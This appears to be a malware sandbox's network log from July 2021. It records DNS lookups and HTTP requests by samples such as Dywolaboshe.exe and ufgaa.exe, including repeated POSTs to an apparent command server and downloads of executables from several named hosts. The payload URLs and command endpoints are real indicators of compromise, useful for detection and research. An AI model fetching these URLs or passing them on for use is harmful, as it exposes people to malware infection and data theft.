                                                                                          http://162.55.223.232/
                                                                                          31DF.exe
                                                                                          Remote address:
                                                                                          162.55.223.232:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                          Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                          Content-Length: 3612
                                                                                          Host: 162.55.223.232
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:40 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Content-Encoding: gzip
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 180
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 58
                                                                                          Date: Fri, 09 Jul 2021 23:04:40 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 57
                                                                                          Date: Fri, 09 Jul 2021 23:04:41 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 264
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 56
                                                                                          Date: Fri, 09 Jul 2021 23:04:41 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 55
                                                                                          Date: Fri, 09 Jul 2021 23:04:44 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 54
                                                                                          Date: Fri, 09 Jul 2021 23:04:44 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 53
                                                                                          Date: Fri, 09 Jul 2021 23:04:48 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 52
                                                                                          Date: Fri, 09 Jul 2021 23:04:50 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 51
                                                                                          Date: Fri, 09 Jul 2021 23:04:52 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 224
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 50
                                                                                          Date: Fri, 09 Jul 2021 23:04:52 GMT
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          g-partners.live
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          g-partners.live
                                                                                          IN A
                                                                                          Response
                                                                                          g-partners.live
                                                                                          IN A
                                                                                          176.113.115.136
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://g-partners.live/installer.php?pub=five
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          176.113.115.136:80
                                                                                          Request
                                                                                          GET /installer.php?pub=five HTTP/1.1
                                                                                          Host: g-partners.live
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:40 GMT
                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                          X-Powered-By: PHP/5.4.16
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Transfer-Encoding: chunked
                                                                                          Content-Type: text/html
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          d.jumpstreetboys.com
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          d.jumpstreetboys.com
                                                                                          IN A
                                                                                          Response
                                                                                          d.jumpstreetboys.com
                                                                                          IN A
                                                                                          172.67.222.38
                                                                                          d.jumpstreetboys.com
                                                                                          IN A
                                                                                          104.21.62.88
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://d.jumpstreetboys.com/v2Y/installer.exe
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          172.67.222.38:443
                                                                                          Request
                                                                                          GET /v2Y/installer.exe HTTP/1.1
                                                                                          Host: d.jumpstreetboys.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          cf-request-id: 0b2f1d2d2700009c2d0500b000000001
                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gnAP2YyfWCdHVTiRD1m7jb2cyeogobo5Oa2kWKcMb6BJFx9ZEKY8zlFlbOr4NjkxU6USskwTe5eQY7sXVcQc91i0CWDFWqzeYstKRKYO9SlBKuPDs6jckhkDZ%2FoLiAXUYgY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c5315b7e519c2d-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          cache.uutww77.com
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          cache.uutww77.com
                                                                                          IN A
                                                                                          Response
                                                                                          cache.uutww77.com
                                                                                          IN A
                                                                                          172.67.171.54
                                                                                          cache.uutww77.com
                                                                                          IN A
                                                                                          104.21.29.4
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://cache.uutww77.com/juuu/ufgaa.exe
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          172.67.171.54:80
                                                                                          Request
                                                                                          GET /juuu/ufgaa.exe HTTP/1.1
                                                                                          Host: cache.uutww77.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:42 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 994816
                                                                                          Connection: keep-alive
                                                                                          Last-Modified: Wed, 05 May 2021 14:27:38 GMT
                                                                                          ETag: "6092ab5a-f2e00"
                                                                                          Accept-Ranges: bytes
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=KZHV8%2FmbINKjESbGDJUDnoK6GutPjAQoyvji6OypCwdK%2F2zx%2FKR2Lq9EYusRX5geFSH5Bv1lHAibLRPO1v261TGcZM%2Bevpu88YvP3fB1IrUJaCsJ3kZCZ2iPxXTaWA8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c5315f0ec6d8f1-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          a.xyzgame.vip
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          a.xyzgame.vip
                                                                                          IN A
                                                                                          Response
                                                                                          a.xyzgame.vip
                                                                                          IN A
                                                                                          104.21.40.13
                                                                                          a.xyzgame.vip
                                                                                          IN A
                                                                                          172.67.173.218
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://a.xyzgame.vip/userf/2202/google-game.exe
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          104.21.40.13:443
                                                                                          Request
                                                                                          GET /userf/2202/google-game.exe HTTP/1.1
                                                                                          Host: a.xyzgame.vip
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Date: Fri, 09 Jul 2021 23:04:45 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Location: https://b.xyzgame.cc/userf/2202/4c6b7cd617a0dcf2d783efd0d73e87ee.exe
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=UgZrJEc%2FxsgXbZqSFrqpE3FRE7LlcWtuWS1Pl%2BhWwT4cQiNktd4dd7vxn9ytr3hntvRtXh%2FU3U7dpAdcviIM2%2FXtbJqkJRK5dg7XFOIbIIsTmWYuZOOjebB1sw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c53171d8660b67-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          b.xyzgame.cc
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          b.xyzgame.cc
                                                                                          IN A
                                                                                          Response
                                                                                          b.xyzgame.cc
                                                                                          IN A
                                                                                          172.67.178.136
                                                                                          b.xyzgame.cc
                                                                                          IN A
                                                                                          104.21.51.99
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://b.xyzgame.cc/userf/2202/4c6b7cd617a0dcf2d783efd0d73e87ee.exe
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          172.67.178.136:443
                                                                                          Request
                                                                                          GET /userf/2202/4c6b7cd617a0dcf2d783efd0d73e87ee.exe HTTP/1.1
                                                                                          Host: b.xyzgame.cc
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:46 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Content-Disposition: attachment; filename="yanzhang.exe"
                                                                                          Content-Transfer-Encoding: binary
                                                                                          Vary: Accept-Encoding
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=L1tGtXXeCdS9wiw3OqF%2FTNomMlW0%2FHbvCgcJNJwyslSu%2BGRSTQz4iJj6tU9T2Uy3yZq2dN8vtjw45qZCBvH9WazQ7HY6gJxNoGlLdkGHJhoGqXx0eP8JYRLJ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c5317689714c7a-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          ip-api.com
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          ip-api.com
                                                                                          IN A
                                                                                          Response
                                                                                          ip-api.com
                                                                                          IN A
                                                                                          208.95.112.1
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://ip-api.com/json/
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          208.95.112.1:80
                                                                                          Request
                                                                                          GET /json/ HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Host: ip-api.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:47 GMT
                                                                                          Content-Type: application/json; charset=utf-8
                                                                                          Content-Length: 323
                                                                                          Access-Control-Allow-Origin: *
                                                                                          X-Ttl: 60
                                                                                          X-Rl: 44
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          fb.xiaomishop.me
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          fb.xiaomishop.me
                                                                                          IN A
                                                                                          Response
                                                                                          fb.xiaomishop.me
                                                                                          IN A
                                                                                          104.18.9.171
                                                                                          fb.xiaomishop.me
                                                                                          IN A
                                                                                          104.18.8.171
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://fb.xiaomishop.me/channel?md5=ecf845a9c953066463e27617c587896c
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          104.18.9.171:443
                                                                                          Request
                                                                                          GET /channel?md5=ecf845a9c953066463e27617c587896c HTTP/1.1
                                                                                          Host: fb.xiaomishop.me
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:49 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Set-Cookie: PHPSESSID=15905f97c5875a4876fa6dbc02759866; path=/
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c531894b981e99-AMS
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.bandersajtebrauch.club
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.bandersajtebrauch.club
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://g-partners.live/installer.php?pub=one
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          176.113.115.136:80
                                                                                          Request
                                                                                          GET /installer.php?pub=one HTTP/1.1
                                                                                          Host: g-partners.live
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:49 GMT
                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                          X-Powered-By: PHP/5.4.16
                                                                                          Transfer-Encoding: chunked
                                                                                          Content-Type: text/html
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.facebook.com
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.facebook.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.facebook.com
                                                                                          IN CNAME
                                                                                          star-mini.c10r.facebook.com
                                                                                          star-mini.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.36
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.facebook.com/
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          31.13.83.36:443
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Sec-Fetch-Dest: document
                                                                                          Sec-Fetch-Mode: navigate
                                                                                          Sec-Fetch-Site: none
                                                                                          Sec-Fetch-User: ?1
                                                                                          Upgrade-Insecure-Requests: 1
                                                                                          Host: www.facebook.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Vary: Accept-Encoding
                                                                                          x-fb-rlafr: 0
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 0
                                                                                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                                                                                          X-Frame-Options: DENY
                                                                                          Strict-Transport-Security: max-age=15552000; preload
                                                                                          Content-Type: text/html; charset="utf-8"
                                                                                          X-FB-Debug: Y12Y/8Eh9BKjDMhyNrWZlTCKzOzuRyfYUbl/NvrvKw5DO8Pc/DoOm2487cI/vQ1JizIwHT/mAaDI4CTqMFSccQ==
                                                                                          Date: Fri, 09 Jul 2021 23:04:50 GMT
                                                                                          Priority: u=3,i
                                                                                          Transfer-Encoding: chunked
                                                                                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                                                                                          Connection: keep-alive
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.facebook.com/
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          31.13.83.36:443
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Sec-Fetch-Dest: document
                                                                                          Sec-Fetch-Mode: navigate
                                                                                          Sec-Fetch-Site: none
                                                                                          Sec-Fetch-User: ?1
                                                                                          Upgrade-Insecure-Requests: 1
                                                                                          Host: www.facebook.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Vary: Accept-Encoding
                                                                                          x-fb-rlafr: 0
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 0
                                                                                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                                                                                          X-Frame-Options: DENY
                                                                                          Strict-Transport-Security: max-age=15552000; preload
                                                                                          Content-Type: text/html; charset="utf-8"
                                                                                          X-FB-Debug: g/iCPBKGX++VSPw5cHfc1OK8exleSrXjXUykveARFEcbutKK1uyGprRl2tOdHnXMFCCZOuN13V28Bpw08sTpxg==
                                                                                          Date: Fri, 09 Jul 2021 23:04:58 GMT
                                                                                          Priority: u=3,i
                                                                                          Transfer-Encoding: chunked
                                                                                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                                                                                          Connection: keep-alive
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://iplogger.org/1zHzt7
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          88.99.66.31:443
                                                                                          Request
                                                                                          GET /1zHzt7 HTTP/1.1
                                                                                          Host: iplogger.org
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:51 GMT
                                                                                          Content-Type: image/png
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
